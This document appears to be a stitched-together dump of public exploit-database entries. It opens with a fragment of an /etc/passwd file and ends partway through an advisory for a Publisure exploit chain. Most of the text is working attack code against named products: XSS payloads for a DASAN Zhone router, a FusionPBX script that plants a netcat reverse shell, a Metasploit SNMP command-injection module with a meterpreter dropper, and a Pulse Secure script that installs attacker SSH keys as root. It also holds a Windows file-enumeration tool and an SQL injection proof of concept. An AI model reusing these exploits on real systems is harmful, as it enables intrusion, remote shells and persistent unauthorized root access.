mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin chrony:x:996:993::/var/lib/chrony:/sbin/nologin cakes:x:1001:1001:cakes:/home/cakes:/bin/bash

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. # Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU # Date: 31.03.2019 # Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl # Vendor Homepage: https://dasanzhone.com # Version: <= S3.1.285 # Alternate Version: <= S3.0.738 # Tested on: version S3.1.285 (alternate version S3.0.738) # CVE : CVE-2019-10677 = Reflected Cross-Site Scripting (XSS) = http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp = Stored Cross-Site Scripting (XSS) = * WiFi network plaintext password http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);// http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);// * CSRF token http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);// = Clickjacking = <html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

#!/usr/bin/python3 ''' # Exploit Title: FusionPBX v4.4.8 Remote Code Execution # Date: 13/08/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : 2019-15029 # Vendor Homepage: https://www.fusionpbx.com # Software link: https://www.fusionpbx.com/download # Version: v4.4.8 # Tested on: Ubuntu 18.04 / PHP 7.2 ''' import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import warnings from bs4 import BeautifulSoup # turn off BeautifulSoup and requests warnings warnings.filterwarnings("ignore", category=UserWarning, module='bs4') requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 6: print(len(sys.argv)) print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() login_info = { "username": username, "password": password } login_request = request.post( url+"/core/user_settings/user_dashboard.php", login_info, verify=False ) if "Invalid Username and/or Password" not in login_request.text: print("[+] Logged in successfully") else: print("[+] Error with creds") service_edit_page = url + "/app/services/service_edit.php" services_page = url + "/app/services/services.php" payload_info = { # the service name you want to create "service_name":"PwnedService3", "service_type":"pid", "service_data":"1", # this value contains the payload , you can change it as you want "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z", "service_cmd_stop":"stop", "service_description":"desc", "submit":"Save" } request.post(service_edit_page, payload_info, verify=False) html_page = request.get(services_page, verify=False) soup = BeautifulSoup(html_page.text, "lxml") for a in soup.find_all(href=True): if "PwnedService3" in a: sid = a["href"].split("=")[1] break service_page = url + "/app/services/services.php?id=" + sid + "&a=start" print("[+] Triggering the exploit , check your netcat !") request.get(service_page, verify=False)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => "AwindInc SNMP Service Command Injection", 'Description' => %q{ This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability. The following devices are known to be affected by this issue: * Crestron Airmedia AM-100 <= version 1.5.0.4 * Crestron Airmedia AM-101 <= version 2.5.0.12 * Awind WiPG-1600w <= version 2.0.1.8 * Awind WiPG-2000d <= version 2.1.6.2 * Barco wePresent 2000 <= version 2.1.5.7 * Newline Trucast 2 <= version 2.1.0.5 * Newline Trucast 3 <= version 2.1.3.7 }, 'License' => MSF_LICENSE, 'Author' => [ 'Quentin Kaiser <kaiserquentin[at]gmail.com>' ], 'References' => [ ['CVE', '2017-16709'], ['URL', 'https://github.com/QKaiser/awind-research'], ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/'] ], 'DisclosureDate' => '2019-03-27', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => true, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'} } ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'CmdStagerFlavor' => %w[wget], 'Type' => :linux_dropper ] ], 'DefaultTarget' => 1, 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'})) register_options( [ OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']), ]) end def check begin connect_snmp sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s print_status("Target system is #{sys_description}") # AM-100 and AM-101 considered EOL, no fix so no need to check version. model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first case model when 'AM-100', 'AM-101' return CheckCode::Vulnerable else # TODO: insert description check for other vulnerable models (that I don't have) # In the meantime, we return 'safe'. return CheckCode::Safe end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end Exploit::CheckCode::Unknown end def inject_payload(cmd) begin connect_snmp varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd)) resp = snmp.set(varbind) if resp.error_status == :noError print_status("Injection successful") else print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'") end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end end def trigger begin connect_snmp varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1)) resp = snmp.set(varbind) if resp.error_status == :noError print_status("Trigger successful") else print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'") end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end end def exploit case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def execute_command(cmd, opts = {}) # The payload must start with a valid FTP URI otherwise the injection point is not reached cmd = "ftp://1.1.1.1/$(#{cmd.to_s})" # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and # keep our reverse shell opened :) cmd << "$(pkill -f /etc/reboot.sh)" # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad cmd << "A" * (255-cmd.length) # we inject our payload in camFWUpgradeFTPURL print_status("Injecting payload") inject_payload(cmd) # we trigger the firmware download via FTP, which will end up calling this # "/bin/getRemoteURL.sh %s %s %s %d" print_status("Triggering call") trigger end end

#!/usr/bin/python # # Exploit Title: Pulse Secure Post-Auth Remote Code Execution # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 09/05/2019 # Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: linux # CVE : CVE-2019-11539 # # Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) # # Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN # Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. # You will need your own configuration and authorized_keys files. # # Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 # Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html # # Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. # We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. # # Imports import requests import urllib from bs4 import BeautifulSoup # Host information host = '' # Host to exploit login_url = '/dana-na/auth/url_admin/login.cgi' # Login page CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code # Login Credentials user = 'admin' # Default Username password = 'password' # Default Password # Necessary for Curl downloadHost = '' # IP or FQDN for host running webserver port = '' # Port where web service is running. Needs to be a string, hence the quotes. # Proxy Configuration # Uncomment if you need to use a proxy or for debugging requests proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } # Headers for requests headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded', } # Cookies to send with request cookies = { 'lastRealm':'Admin%20Users', 'DSSIGNIN':'url_admin', 'DSSignInURL':'/admin/', 'DSPERSISTMSG':'', } # Data for post request loginData = { 'tz_offset': 0, 'username': user, 'password': password, 'realm': 'Admin Users', 'btnSubmit': 'Sign In', } s = requests.Session() # Sets up the session s.proxies = proxies # Sets up the proxies # Disable Warnings from requests library requests.packages.urllib3.disable_warnings() # Administrator Login logic # Probably wouldn't have figured this out without help from @buffaloverflow def adminLogin(): global xsAuth global _headers # Send the intial request r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) print('[#] Logging in...') # Self Explanatory r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request print('[#] Sent Login Request...') # Login Logic if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer r = s.get(referer, verify=False) # Sends a get request soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr print('[#] Grabbing xsauth...') xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token print('[!] Got xsauth: ' + xsAuth) # Self Explanatory data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page _headers = headers # Sets the headers _headers.update({'referer':referer}) # Updates the headers r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request print('[+] Logged in!') # Self Explanatory # Command injection logic def cmdInject(command): r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) if r.status_code == 200: soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token payload = { 'a':'td', 'chkInternal':'On', 'optIFInternal':'int0', 'pmisc':'on', 'filter':'', 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, 'toggle':'Start+Sniffing', 'xsauth':xsAuth } # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run # Sends the get request to overwrite the template r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) # Sends the get request to execute the code r = s.get('https://' + host + CommandExecURL, verify=False) # Main logic if __name__ == '__main__': adminLogin() try: print('[!] Starting Exploit') print('[*] Opening Firewall port...') cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port print('[*] Downloading Necessary Files....') cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys print('[*] Backing up Files...') cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys print('[*] Overwriting Old Files...') cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys print('[*] Restarting SSHD...') cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP print('[!] Done Exploiting the system.') print('[!] Please use the following command:') print('[!] ssh -p6667 root@%s') %(host) except Exception as e: raise

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows NTFS NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family. [Vulnerability Type] Privileged File Access Enumeration [CVE Reference] N/A [Security Issue] Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name. This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension or have a "." (dot) as part of the file or folder name. Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities. Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename are always issued the expected "Access is denied" system error message. However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning: "The system cannot find the file". This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file". Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not. This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not. However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible users file on the command line much like calling a program and pressing the enter key. After the Win32 API function CreateFile is called an it returns either: 1) "The system cannot find the file" 2) "Access is denied" C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact The system cannot find the file <==== DOES NOT EXIST C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact Access is denied. <===== EXISTS C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con The system cannot find the file <==== DOES NOT EXIST C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing files or folders in the local file system. Tested successfully Win7/10 [Exploit/POC] "NtFileSins.py" from subprocess import Popen, PIPE import sys,argparse,re # NtFileSins v2.1 # Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. # Fixed: save() logic to log report in case no Zone.Identifiers found. # # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges (not admin to admin). # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. # #======================================================================# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 # # By John Page (aka hyp3rlinx) # # Apparition Security # #======================================================================# BANNER=''' _ _______________ __ _____ _ / | / /_ __/ ____(_) /__ / ___/(_)___ _____ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1 By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] APPDATA_DIR=["AppData/Local/Temp"] EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) REPORT="NtFileSins_Log.txt" def usage(): print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" print '-u victim -d Searches -a "MS17-020 - Google Search.url"' print '-u victim -a "<name.ext>"' print "-u victim -d Downloads -a <name.ext> -s" print '-u victim -d Contacts -a "Mike N.contact"' print "-u victim -a APT.txt -b -n" print "-u victim -d -z Desktop/MyFiles -a <.name>" print "-u victim -d Searches -a <name>.search-ms" print "-u victim -d . -a <name.ext>" print "-u victim -d desktop -a inverted-crosses.mp3 -b" print "-u victim -d Downloads -a APT.exe -b" print "-u victim -f list_of_files.txt" print "-u victim -f list_of_files.txt -b -s" print "-u victim -f list_of_files.txt -x .txt" print "-u victim -d desktop -f list_of_files.txt -b" print "-u victim -d desktop -f list_of_files.txt -x .rar" print "-u victim -z -s -f list_of_files.txt" def parse_args(): parser.add_argument("-u", "--user", help="Privileged user target") parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.") parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.") parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.") parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.") parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.") parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.") parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.") parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT) parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.") parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.") return parser.parse_args() def access(j): result="" try: p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True) stderr,stdout = p.communicate() result = stdout.strip() except Exception as e: #print str(e) pass return result def artifacts_from_file(artifacts_file, bflag, specific_ext): try: f=open(artifacts_file, "r") for a in f: idx = a.rfind(".") a = a.strip() if a != "": if specific_ext: if idx==-1: a = a + specific_ext else: #replace existing ext a = a[:idx] + specific_ext if bflag: ARTIFACTS_SET.add(a) else: ARTIFACTS_SET.add(a) f.close() except Exception as e: print str(e) exit() def save(): try: f=open(REPORT, "w") for j in found_set: f.write(j+"\n") f.close() except Exception as e: print str(e) def recon_msg(s): if s == 0: return "Access is denied." else: return "\t[*] Artifact exists ==>" def echo_results(args, res, x, i): global sin_cnt if res=="": print "\t[!] No NTFS message, you must already be admin, then this script is not required." exit() if "not recognized as an internal or external command" in res: print "\t[!] You must target users with higher privileges than yours." exit() if res != recon_msg(0): if args.verbose: print "\t"+res else: if args.notfound: print "\t[-] not found: " + x +"/"+ i else: sin_cnt += 1 if args.save or args.zone_identifier: found_set.add(x+"/"+i) if args.verbose: print recon_msg(1)+ x+"/"+i print "\t"+res else: print recon_msg(1)+ x+"/"+i def valid_artifact_name(sin,args): idx = "." in sin if re.findall(r"[/\\*?:<>|]", sin): print "\t[!] Skipping: disallowed file name character." return False if not idx and not args.built_in_ext and not args.specific_ext: print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives." print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives." if not args.built_in_ext: if sin[-1] == ".": print "\t[!] Skipping: "+sin+" non valid file name." return False return True def search_missing_ext(path,args,i): for x in path: for e in EXTS: res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) echo_results(args, res, x, i+e) #Check if the found artifact was downloaded from internet def zone_identifier_check(args): global ROOTDIR, internet_sin_cnt zone_set.update(found_set) for c in found_set: c = c + ZONE_IDENTIFIER res = access(ROOTDIR+args.user+"/"+c) if res == "Access is denied.": internet_sin_cnt += 1 print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!." zone_set.add(c) def ntsins(path,args,i): if i.rfind(".")==-1: search_missing_ext(path,args,i) i="" for x in path: if i != "": if args.built_in_ext: for e in EXTS: res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) echo_results(args, res, x, i+e) elif args.specific_ext: idx = i.rfind(".") if idx == -1: i = i + "." else: i = i[:idx] + args.specific_ext res = access(ROOTDIR+args.user+"/"+x+"/"+i) echo_results(args, res, x, i) def search(args): print "\tSearching...\n" global ROOTDIR, USER_DIRS, ARTIFACTS_SET if args.artifact: ARTIFACTS_SET = set([args.artifact]) for i in ARTIFACTS_SET: idx = i.rfind(".") + 1 if idx and args.built_in_ext: i = i[:idx -1:None] if len(i) > 0 and i != None: if valid_artifact_name(i,args): #specific user dir search if args.directory: single_dir=[args.directory] ntsins(single_dir,args,i) #search appdata dirs elif args.appdata: ntsins(APPDATA_DIR,args,i) #all default user dirs else: ntsins(USER_DIRS,args,i) def check_dir_input(_dir): if len(re.findall(r":", _dir)) != 0: print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h." return False return True def main(args): if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) if args.examples: usage() exit() if not args.user: print "[!] No target user specified see Help -h" exit() if args.appdata and args.directory: print "[!] Multiple search directories supplied see Help -h" exit() if args.specific_ext: if "." not in args.specific_ext: print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives." exit() if args.artifact and args.artifacts_from_file: print "[!] Multiple artifacts specified, use just -f or -a see Help -h" exit() if args.built_in_ext and args.specific_ext: print "\t[!] Both specific and built-in extensions supplied, use only one." exit() if args.specific_ext and not args.artifacts_from_file: print "\t[!] -x to be used with -f flag only see Help -h." exit() if args.artifact: if args.artifact.rfind(".")==-1: print "\t[!] Artifacts must contain a .ext or will result in false positives." exit() if args.directory: if not check_dir_input(args.directory): exit() if args.artifacts_from_file: artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext) if not args.artifact and not args.artifacts_from_file: print "[!] Exiting, no artifacts supplied see Help -h" exit() else: search(args) if sin_cnt >= 1 and args.zone_identifier: zone_identifier_check(args) if args.save and len(found_set) != 0 and not args.zone_identifier: save() if args.save and len(zone_set) != 0: found_set.update(zone_set) save() print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n" if args.zone_identifier and internet_sin_cnt >= 1: print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n" if not args.notfound: print "\tuse -n to display unfound enumerated files." if not args.built_in_ext: print "\tfor extra search coverage try -b flag or targeted artifact search -a." if __name__ == "__main__": print BANNER parser = argparse.ArgumentParser() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=rm8kEbewqpI [Network Access] Remote/Local [Severity] Low [Disclosure Timeline] Vendor Notification: July 29, 2019 MSRC "does not meet the bar for security servicing" : July 29, 2019 September 5, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Inventory Webapp SQL injection # Data: 05.09.2019 # Exploit Author: mohammad zaheri # Vendor HomagePage: https://github.com/edlangley/inventory-webapp # Tested on: Windows # Google Dork: N/A ========= Vulnerable Page: ========= /php/add-item.php ========== Vulnerable Source: ========== Line39: $name = $_GET["name"]; Line39: $description = $_GET["description"]; Line39: $quantity = $_GET["quantity"]; Line39: $cat_id = $_GET["cat_id"]; Line49: if(mysql_query($itemquery, $conn)) ========= POC: ========= http://site.com/php/add-item.php?itemquery=[SQL] ========= Contact Me : ========= Telegram : @m_zhrii Email : [email protected]

##################################################################################### # Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain] # Google Dork: [N/A] # Date: [05/09/2019] # Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company] # Vendor Homepage: [https://www.publisure.com/] # Software Link: [N/C] # Version: [version 2.1.2] # Tested on: [Windows 7 Enterprise] # CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254] ##################################################################################### # Improper Access Control # # CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) # OVE ID: OVE-20190724-0002 # CVE ID: CVE-2019-14253 # ##################################################################################### # (Pre-Authenticated) Multiples SQL injection # # CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) # OVE ID: OVE-20190724-0003 # CVE ID: CVE-2019-14254 # ##################################################################################### # Unrestricted File Upload RCE # # CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) # OVE ID: OVE-20190724-0004 # CVE ID: CVE-2019-14252 # ##################################################################################### # Fixes: # Upgrade to latest product version and/or contact support for patches ##################################################################################### I. PRODUCT Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution. Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released. II. ADVISORY A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application. III. VULNERABILITIES DESCRIPTIONS a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted. b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions. Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example). c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form. This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file). IV. PROOF OF CONCEPT a) Access to AdminDir PHP scripts and database querying is possible 